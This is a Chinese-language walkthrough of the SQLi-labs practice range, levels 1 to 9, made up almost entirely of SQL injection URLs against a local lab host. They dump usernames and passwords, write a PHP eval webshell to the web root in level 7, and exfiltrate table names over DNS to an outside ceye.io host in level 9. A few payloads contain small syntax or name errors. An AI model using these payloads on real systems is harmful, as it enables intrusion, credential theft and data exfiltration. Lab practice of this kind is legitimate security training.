SQLlab靶场闯关(全关通正在努力更新中)
第一关
1.http://192.168.159.131:8000/sqli/Less-1/?id=-1' order by 3--+
2.http://192.168.159.131:8000/sqli/Less-1/?id=-1' union select 1,2,3--+
3.http://192.168.159.131:8000/sqli/Less-1/?id=-1' union select 1,database(),version()--+
4.http://192.168.159.131:8000/sqli/Less-1/?id=-1' union select 1,(select group_concat( table_name) from information_schema.tables where),3 --+
5.http://192.168.159.131:8000/sqli/Less-1/?id=-1' union select 1,(select group_concat( column_name) from information_schema.columns where table_schema='security' and table_name='user'),3 --+
6.http://192.168.159.131:8000/sqli/Less-1/?id=-1' union select 1, (select group_concat(username) from users), (select group_concat(password) from users) --+
7.http://192.168.159.131:8000/sqli/Less-1/?id=-1' union select 1, (select group_concat(concat_ws('=>', username, password) separator '|' ) from users), 3 --+
第二关
1.http://192.168.159.131:8000/sqli/Less-2/?id=1 and 1=1 在判断发现id后的字符无需单引号闭合直接进行判断,故当前注入为整型注入
2.http://192.168.159.131:8000/sqli/Less-2/?id=1 and 1=2
3.http://192.168.159.131:8000/sqli/Less-2/?id=1 order by 3
4.http://192.168.159.131:8000/sqli/Less-2/?id=1 union select 1,2,3 --+
5.http://192.168.159.131:8000/sqli/Less-2/?id=-1 union select 1,user(),version() --+
6.http://192.168.159.131:8000/sqli/Less-2/?id=-1 union select 2,3,group_concat(table_name) from information_schema.tables where table_schema=database() --+
[group_concat()将全部数据以一行全部展现,以逗号分隔]
7.http://192.168.159.131:8000/sqli/Less-2/?id=-1 union select 1, (select group_concat(column_name) from information_schema.columns where table_name = 'users'), 3 --+
[concat_ws()使用连接符将内容分开]
8.http://192.168.159.131:8000/sqli/Less-2/?id=-1 union select 2,3,group_concat(username,':',password)from security.users --+
第三关
1.http://192.168.159.131:8000/sqli/Less-3/?id=1‘) # 闭合显示正常
2.http://192.168.159.131:8000/sqli/Less-3/?id=-1') or 1=1 %23
3.http://192.168.159.131:8000/sqli/Less-3/?id=-1') or 1=2 %23
4.http://192.168.159.131:8000/sqli/Less-3/?id=-1') order by 4 --+ 发出提示并不存在继续减少列数
5.http://192.168.159.131:8000/sqli/Less-3/?id=-1') order by 3 --+ 判断完成
6.http://192.168.159.131:8000/sqli/Less-3/?id=-1') union select 1,2,3 --+ 判断回显位置
7.http://192.168.159.131:8000/sqli/Less-3/?id=-1') union select 1,version(),database() --+
8.http://192.168.159.131:8000/sqli/Less-3/?id=-1') union select 1,(select group_concat(table_name) from information_schema.tables where table_schema = 'security' ),3 --+
9.http://192.168.159.131:8000/sqli/Less-3/?id=-1') union select 1,(select group_concat(column_name) from information_schema.columns where table_name='user' ),3 --+
10.http://192.168.159.131:8000/sqli/Less-3/?id=-1') union select 1,2, group_concat(concat_ws(0x7e,username,password)) from security.users --+
第四关
1.http://192.168.159.131:8000/sqli/Less-4/?id=1" --+
2.http://192.168.159.131:8000/sqli/Less-4/?id=1") --+
3.http://192.168.159.131:8000/sqli/Less-4/?id=1") order by 3 --+
4.http://192.168.159.131:8000/sqli/Less-4/?id=-1") union select 1,2,3--+
5.http://192.168.159.131:8000/sqli/Less-4/?id=-1") union select 1,database(),version()--+
6.http://192.168.159.131:8000/sqli/Less-4/?id=-1") union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3 --+
7.http://192.168.159.131:8000/sqli/Less-4/?id=-1") union select 1,(select group_concat(column_name) from information_schema.columns where table_name='users'),3 --+
或十六进制的表名users转换为十六进制时先将users前加0x即:0xusers 转换为十六进制编码:0x7573657273
(http://192.168.159.131:8000/sqli/Less-4/?id=-1") union select 1,(select group_concat(column_name) from information_schema.columns where table_name=0x7573657273),3 --+)
8.http://192.168.159.131:8000/sqli/Less-4/?id=-1") union select 1,(select group_concat(concat_ws(0x7e,username,password)) from security.users),3--+
第五关
(方法一)left()
1、http://192.168.159.131:8000/sqli/Less-5/?id=1%27and%20left(version(),1)=5%23 --+ 利用最开始头几关获取的信息进行盲注判断(当前数据库版本号为5.6.17,在源代码中得知正确判断时候返回 You are in ...,若判断错误将回显消失)
2、http://192.168.159.131:8000/sqli/Less-5/?id=1%27and%20length(database())=8%23--+ 判断数据库长度为8位字符
3、http://192.168.159.131:8000/sqli/Less-5/?id=1%27and%20left(database(),1)>'a' --+ 尝试去运用>进行判断数据库第一位是否>a,数据库名为security,当然很明显s>a,所以返回正确,在不知情时候要学会采取二分法用于 提高注入效率
4、http://192.168.159.131:8000/sqli/Less-5/?id=1%27and%20left(database(),2)>'sa' --+猜测数据库第二位,得知第一位为s,进行判断前两位是否大于sa,同样满足se>sa
.......
(方法二)substr()
1、http://192.168.159.131:8000/sqli/Less-5/?id=1%27and%20ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),1,1))=101--+ 将获取的表名字符串(email)以substr进行截取然后再将其利用ascii函数进行转换(e的ascii码为101)
2、http://192.168.159.131:8000/sqli/Less-5/?id=1%27and%20ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),2,1))=109--+ (m的ascii为109)修改limit的参数将变换各个表名,修改substr的参数将修改获取字符串的各个字符
3、.......
(方法三)regexp
1、http://192.168.159.131:8000/sqli/Less-5/?id=1%27and%201=(select 1 from information_schema.columns where table_name='users' and column_name regexp '^username'limit 0,1) --+选择users表中列名是否有username的列。利用正则匹配进行获取信息,在利用regexp函数进行匹配时,如果可以匹配到显示结果为1否则结果为0,为方便判断将其与1进行比较
(方法四)ORD()、MID()、CAST()、IFNULL()
1、http://192.168.159.131:8000/sqli/Less-5/?id=1%27%20and%20ORD(MID((select%20IFNULL(CAST(username%20AS%20CHAR),0x20)FROM%20security.users%20order%20by%20id%20limit%200,1),1,1))=68 --+ ORD()函数为返回第一个字符的ASCII码,MID()函数为截取字符串的一部分,CAST()函数用于类型转换,CAST(x AS type) 转换数据类型将x转换为type类型,IFNULL(v1,v2)如果v1的值不为NULL,则返回v1,否则返回v2。将username转换为字符串,当username字符串不为空时把security.users以id排序后的第一条的第一个字符的ascii取出将其与68做比较,同类方式依次进行比较即可
第六关(实质和第五关一样单引号换成双引号)id参数传入服务器时,对id参数进行处理
1、http://192.168.159.131:8000/sqli/Less-6/?id=1"--+ 判断注入
2、http://192.168.159.131:8000/sqli/Less-6/?id=1" and left(version(),1)=5--+判断数据库版本号
3、http://192.168.159.131:8000/sqli/Less-6/?id=1" and length(database())>7--+判断数据库长度
4、http://192.168.159.131:8000/sqli/Less-6/?id=1" and left(database(),1)>'a' --+判断数据库名第一位与a的关系(数据库名为security,当然很明显s>a)
5、http://192.168.159.131:8000/sqli/Less-6/?id=1" and left(database(),2)>'sa' --+判断数据库中第二位与sa的关系继续递推可以获得数据库全称
6、http://192.168.159.131:8000/sqli/Less-6/?id=1" and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>100--+猜取数据库表名
7、http://192.168.159.131:8000/sqli/Less-6/?id=1" and 1=(select 1 from information_schema.columns where table_name='users' and column_name regexp '^us[a-z]' limit 0,1 ) --+判断第一列,利用匹配判断是否存在需要猜测的列名
8、http://192.168.159.131:8000/sqli/Less-6/?id=1" and 1=(select 1 from information_schema.columns where table_name='users' and column_name regexp '^username' limit 0,1 ) --+判断表中是否存在username列名
9、http://192.168.159.131:8000/sqli/Less-6/?id=1" and ord(mid((select ifnull(cast(username as char),0x20)from security.users order by id limit 0,1),1,1))=68 --+ 获取username中第一行的第一个字符的ascii与68比较即为D,同样方式递推得到该字符串为Dumb
第七关
1、http://192.168.159.131:8000/sqli/Less-7/?id=1' --+报错存在注入
2、http://192.168.159.131:8000/sqli/Less-7/?id=1')) --+发现成功闭合,页面回显正常
3、http://192.168.159.131:8000/sqli/Less-7/?id=1')) or 1=1--+%23 --+ 注入方式进行注入
4、http://192.168.159.131:8000/sqli/Less-7/?id=1')) union select 1,2,3 into outfile "c:\\phpStudy\\WWW\\sqli\\Less-7\\uu.txt"%23 --+利用已知的路径进行写入,输入注入语句报错不要紧,刷新写入路径可以看到文件已经成功被写入。
5、http://192.168.159.131:8000/sqli/Less-7/uu.txt 访问上一步骤写入的页面,可见我们将union联合查询的语句执行的结果写入到了uu.txt中。
6、http://192.168.159.131:8000/sqli/Less-7/?id=1')) union select 1,2,'<?php @eval($_POST["hacker"]); ?>' into outfile "c:\\phpStudy\\WWW\\sqli\\Less-7\\hacker1.php"%23 --+ 写入一句话,利用蚁剑成功连接,完成。
第八关
1、http://192.168.159.131:8000/sqli/Less-8/?id=1' and ascii(substr((select database()),1,1))=114 --+
2、http://192.168.159.131:8000/sqli/Less-8/?id=1' and ascii(substr((select database()),1,1))=115--+ 显示正常
3、http://192.168.159.131:8000/sqli/Less-8/?id=1'and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101--+ 利用burpsuite进行模糊测试从48到122,利用python中的 chr(109)和 ord("s")进行ascII的转换
第九关
简单的各种payload,单引号和判断语句完全不起任何作用此时就需要考虑是否为延时注入,页面变化已不再
http://192.168.159.131:8000/sqli/Less-9/
?id=1' and
SELECT LOAD_FILE(CONCAT('\\\\',(SELECT table_name from information_schema.tables where table_schema=database() LIMIT 1),'.mysql.927u4v.ceye.io
\\abc')) --
浙公网安备 33010602011771号